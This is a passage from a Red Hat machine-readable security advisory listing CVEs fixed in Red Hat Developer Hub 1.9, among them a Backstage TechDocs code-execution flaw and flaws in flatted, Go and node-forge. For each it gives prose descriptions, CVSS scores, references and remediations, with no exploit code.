          "system_name": "Red Hat Bugzilla ID",
          "text": "2445480"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Backstage. The backstage/plugin-techdocs-node package uses an allowlist to filter dangerous MkDocs configuration keys during the documentation build process. A gap in this allowlist allows attackers to craft an mkdocs.yml file that causes arbitrary Python code execution.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "backstage/plugin-techdocs-node: TechDocs Mkdocs configuration key enables arbitrary code execution",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "To exploit this issue, an attacker needs commit access to a repository that Backstage is configured to track and build in order to introduce a malicious mkdocs.yml file into the TechDocs build pipeline. Additionally, an attacker can execute arbitrary Python code but the payload is confined by the permissions granted to the TechDocs build process which is typically a restricted service account, limiting the impact of this vulnerability. Due to these reasons, this vulnerability has been rated with an important severity.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-29186"
        },
        {
          "category": "external",
          "summary": "RHBZ#2445480",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445480"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-29186",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-29186"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-29186",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29186"
        },
        {
          "category": "external",
          "summary": "https://github.com/backstage/backstage/security/advisories/GHSA-928r-fm4v-mvrw",
          "url": "https://github.com/backstage/backstage/security/advisories/GHSA-928r-fm4v-mvrw"
        }
      ],
      "release_date": "2026-03-07T15:03:51.422000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-05T16:10:46+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:13826"
        },
        {
          "category": "workaround",
          "details": "To mitigate this issue, enable docker isolation by updating the Backstage configuration to use \u0027runIn: docker\u0027 instead of \u0027runIn: local\u0027, confining the arbitrary Python code execution to a containerized environment. Additionally, limit commit access to repositories tracked by Backstage to trusted contributors only, and enforce mandatory pull request (PR) reviews for any modifications made to the mkdocs.yml file.",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "backstage/plugin-techdocs-node: TechDocs Mkdocs configuration key enables arbitrary code execution"
    },
    {
      "cve": "CVE-2026-32141",
      "cwe": {
        "id": "CWE-770",
        "name": "Allocation of Resources Without Limits or Throttling"
      },
      "discovery_date": "2026-03-12T19:01:30.987208+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2447083"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A denial of service flaw has been discovered in the flatted npm library. flatted\u0027s parse() function uses a recursive revive() phase to resolve circular references in deserialized JSON. When given a crafted payload with deeply nested or self-referential $ indices, the recursion depth is unbounded, causing a stack overflow that crashes the Node.js process.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "flatted: flatted: Unbounded recursion DoS in parse() revive phase",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-32141"
        },
        {
          "category": "external",
          "summary": "RHBZ#2447083",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2447083"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-32141",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-32141"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-32141",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32141"
        },
        {
          "category": "external",
          "summary": "https://github.com/WebReflection/flatted/commit/7eb65d857e1a40de11c47461cdbc8541449f0606",
          "url": "https://github.com/WebReflection/flatted/commit/7eb65d857e1a40de11c47461cdbc8541449f0606"
        },
        {
          "category": "external",
          "summary": "https://github.com/WebReflection/flatted/pull/88",
          "url": "https://github.com/WebReflection/flatted/pull/88"
        },
        {
          "category": "external",
          "summary": "https://github.com/WebReflection/flatted/security/advisories/GHSA-25h7-pfq9-p65f",
          "url": "https://github.com/WebReflection/flatted/security/advisories/GHSA-25h7-pfq9-p65f"
        }
      ],
      "release_date": "2026-03-12T18:08:09.634000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-05T16:10:46+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:13826"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "flatted: flatted: Unbounded recursion DoS in parse() revive phase"
    },
    {
      "cve": "CVE-2026-32280",
      "cwe": {
        "id": "CWE-770",
        "name": "Allocation of Resources Without Limits or Throttling"
      },
      "discovery_date": "2026-04-08T02:01:19.572351+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2456339"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in the Go standard library packages `crypto/x509` and `crypto/tls`. During the process of building a certificate chain, an attacker can provide a large number of intermediate certificates. This excessive input is not properly limited, leading to an uncontrolled amount of work being performed. This can result in a denial of service (DoS) condition, making the affected system or application unavailable to legitimate users.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "crypto/x509: crypto/tls: golang: Go: Denial of Service vulnerability in certificate chain building",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-32280"
        },
        {
          "category": "external",
          "summary": "RHBZ#2456339",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2456339"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-32280",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-32280"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-32280",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32280"
        },
        {
          "category": "external",
          "summary": "https://go.dev/cl/758320",
          "url": "https://go.dev/cl/758320"
        },
        {
          "category": "external",
          "summary": "https://go.dev/issue/78282",
          "url": "https://go.dev/issue/78282"
        },
        {
          "category": "external",
          "summary": "https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU",
          "url": "https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU"
        },
        {
          "category": "external",
          "summary": "https://pkg.go.dev/vuln/GO-2026-4947",
          "url": "https://pkg.go.dev/vuln/GO-2026-4947"
        }
      ],
      "release_date": "2026-04-08T01:06:58.595000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-05T16:10:46+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:13826"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "crypto/x509: crypto/tls: golang: Go: Denial of Service vulnerability in certificate chain building"
    },
    {
      "cve": "CVE-2026-32282",
      "cwe": {
        "id": "CWE-367",
        "name": "Time-of-check Time-of-use (TOCTOU) Race Condition"
      },
      "discovery_date": "2026-04-08T02:01:12.683211+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2456336"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in the internal/syscall/unix package in the Go standard library. If the target of the `Root.Chmod` function is replaced with a symbolic link during execution, specifically after `Root.Chmod` checks the target but before acting, the `chmod` operation will be performed on the file the symbolic link points to. This issue can bypass directory restrictions and lead to unauthorized permission changes on the filesystem.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "golang: internal/syscall/unix: Root.Chmod can follow symlinks out of the root",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "To exploit this issue, an attacker needs access to the system and the required permissions to create a symbolic link. Additionally, the attacker must swap the target file with a symbolic link in the exact window after the `Root.Chmod` function checks its target but before acting. Due to these conditions, this flaw has been rated with a moderate severity.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-32282"
        },
        {
          "category": "external",
          "summary": "RHBZ#2456336",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2456336"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-32282",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-32282"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-32282",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32282"
        },
        {
          "category": "external",
          "summary": "https://go.dev/cl/763761",
          "url": "https://go.dev/cl/763761"
        },
        {
          "category": "external",
          "summary": "https://go.dev/issue/78293",
          "url": "https://go.dev/issue/78293"
        },
        {
          "category": "external",
          "summary": "https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU",
          "url": "https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU"
        },
        {
          "category": "external",
          "summary": "https://pkg.go.dev/vuln/GO-2026-4864",
          "url": "https://pkg.go.dev/vuln/GO-2026-4864"
        }
      ],
      "release_date": "2026-04-08T01:06:55.953000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-05T16:10:46+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:13826"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Moderate"
        }
      ],
      "title": "golang: internal/syscall/unix: Root.Chmod can follow symlinks out of the root"
    },
    {
      "cve": "CVE-2026-33228",
      "cwe": {
        "id": "CWE-915",
        "name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes"
      },
      "discovery_date": "2026-03-21T00:01:43.424803+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2449872"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in flatted, a JavaScript Object Notation (JSON) parser designed for handling circular data structures. A remote attacker can exploit this vulnerability by providing specially crafted JSON input. The parse() function in flatted fails to properly validate string values used as array index keys, allowing an attacker to manipulate internal JavaScript object prototypes. This prototype pollution can enable an attacker to execute arbitrary code or cause a denial of service, impacting the availability and integrity of affected systems.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "flatted: Flatted: Prototype pollution vulnerability allows arbitrary code execution via crafted JSON.",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "A Critical vulnerability was discovered in \u0027flatted\u0027, a JavaScript JSON parser. It could enable a remote, unauthenticated attacker to execute arbitrary code or cause a denial of service. Exploitation involves prototype pollution by providing a specially crafted JSON input. Red Hat products that process un-trusted JSON data and utilize the \u0027flatted\u0027 library are at risk if they do not properly sanitize input.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-33228"
        },
        {
          "category": "external",
          "summary": "RHBZ#2449872",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449872"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-33228",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-33228"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-33228",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33228"
        },
        {
          "category": "external",
          "summary": "https://github.com/WebReflection/flatted/commit/885ddcc33cf9657caf38c57c7be45ae1c5272802",
          "url": "https://github.com/WebReflection/flatted/commit/885ddcc33cf9657caf38c57c7be45ae1c5272802"
        },
        {
          "category": "external",
          "summary": "https://github.com/WebReflection/flatted/releases/tag/v3.4.2",
          "url": "https://github.com/WebReflection/flatted/releases/tag/v3.4.2"
        },
        {
          "category": "external",
          "summary": "https://github.com/WebReflection/flatted/security/advisories/GHSA-rf6f-7fwh-wjgh",
          "url": "https://github.com/WebReflection/flatted/security/advisories/GHSA-rf6f-7fwh-wjgh"
        }
      ],
      "release_date": "2026-03-20T23:06:48.485000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-05T16:10:46+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:13826"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Critical"
        }
      ],
      "title": "flatted: Flatted: Prototype pollution vulnerability allows arbitrary code execution via crafted JSON."
    },
    {
      "cve": "CVE-2026-33891",
      "cwe": {
        "id": "CWE-606",
        "name": "Unchecked Input for Loop Condition"
      },
      "discovery_date": "2026-03-27T21:01:34.410210+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2452450"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in the node-forge library, a JavaScript implementation of Transport Layer Security. This vulnerability, inherited from the bundled jsbn library, allows a remote attacker to cause a Denial of Service (DoS). When the BigInteger.modInverse() function is called with a zero value, it enters an infinite loop, causing the process to hang indefinitely and consume 100% of the CPU resources.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "node-forge: node-forge: Denial of Service via infinite loop in BigInteger.modInverse()",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-33891"
        },
        {
          "category": "external",
